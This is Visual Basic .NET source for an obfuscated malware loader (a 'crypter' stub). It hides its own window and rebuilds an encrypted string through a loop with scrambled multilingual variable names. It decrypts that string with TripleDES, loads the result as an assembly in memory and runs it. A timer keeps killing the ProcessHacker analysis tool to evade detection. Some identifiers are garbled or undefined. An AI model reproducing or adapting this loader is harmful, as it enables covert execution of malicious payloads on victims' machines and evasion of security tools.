﻿Imports System.Security.Cryptography
Imports System.Text
Public Class Form1
    Public Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
        Me.Hide()
        Me.ShowInTaskbar = False
        Me.ShowIcon = False
        Me.Opacity = 0
		Timer1.Start()
        चअठटनघफऑटएऑचञषनठअबडञदटषछऔदकऔखआ
        Dim 谢伟吸乓年仰英伏天吸英份信道说你天英劳式天是不个英信方会是动想常 As String = ""
        Dim ഒരുഉപന്യാസത്തിന്റേതായി As Integer = 种方动式动吸不答方劳不英丢个个语语仰是英英不天表动那的语吸天是伟伟动语个方谢自的词动年语英是问涯劳自动词动表动份自非年不方份天自词涯个不动答吸谢个肉谢英天谢劳是感1.Length
        Dim 动是字年方非种方个感天式个个方方年中英说个感想谢谢涯字天表是频天 As Integer = 1
        Do While (动是字年方非种方个感天式个个方方年中英说个感想谢谢涯字天表是频天 <= ഒരുഉപന്യാസത്തിന്റേതായി)
            谢伟吸乓年仰英伏天吸英份信道说你天英劳式天是不个英信方会是动想常 = 写作者惯常用各种修辞手法曲折传达自己的见解和情
            动是字年方非种方个感天式个个方方年中英说个感想谢谢涯字天表是频天 += 1
        Loop
        Dim 伏答你劳是英份会份十不伙年会 As Object = AppDomain.CurrentDomain.Load(md5Decrypt(Convert.FromBase64String(谢伟吸乓年仰英伏天吸英份信道说你天英劳式天是不个英信方会是动想常), "313"))
        Dim ഏകാഗ്രതയോടെസ As String = 伏答你劳是英份会份十不伙年会.EntryPoint.Invoke(Nothing, Nothing)
    End Sub
    Public Function md5Decrypt(ByVal bytData As Byte(), ByVal sKey As String, Optional ByVal tMode As CipherMode = 2, Optional ByVal tPadding As PaddingMode = 2) As Byte()
        Dim provider As New MD5CryptoServiceProvider
        Dim buffer2 As Byte() = provider.ComputeHash(Encoding.UTF8.GetBytes(sKey))
        provider.Clear()
        Dim provider2 As New TripleDESCryptoServiceProvider
        provider2.Key = buffer2
        provider2.Mode = tMode
        provider2.Padding = tPadding
        Dim buffer3 As Byte() = provider2.CreateDecryptor.TransformFinalBlock(bytData, 0, bytData.Length)
        provider2.Clear()
        Return buffer3
    End Function
    Private Sub Timer1_Tick_1(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick

        For Each Alnsour In Process.GetProcessesByName("ProcessHacker")
            Alnsour.Kill()
        Next
    End Sub
End Class 